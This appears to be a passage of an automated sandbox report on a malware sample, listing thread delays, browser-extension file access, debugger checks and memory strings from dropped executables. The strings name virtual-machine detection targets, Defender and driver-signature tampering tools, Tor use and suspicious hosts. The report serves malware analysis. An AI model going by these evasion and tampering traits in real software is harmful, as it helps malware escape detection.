                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535314
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 534399
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                        Source: 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                        Source: BroomSetup.exe, 00000014.00000002.3180389400.0000000000A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&qk2
                        Source: svchost.exe, 00000002.00000002.3210421837.000002557D656000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3209219507.000002557D644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3183950183.000002557802B000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2149316478.0000000000845000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.0000000000845000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000962000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000878000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:d
                        Source: InstallUtil.exe, 00000008.00000002.3175041380.0000000001565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm+
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareX
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                        Source: BroomSetup.exe, 00000014.00000002.3180389400.0000000000A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*dB
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeAPI call chain: ExitProcess graph end nodegraph_12-6771
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeAPI call chain: ExitProcess graph end nodegraph_16-3615
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79122
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79143
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79125
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-80160
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79144
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79136
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-78965
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79166
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00417B4E
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004502C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00415DC0 mov eax, dword ptr fs:[00000030h]17_2_00415DC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,17_2_00404C70
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00419DC7 SetUnhandledExceptionFilter,17_2_00419DC7
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00417B4E
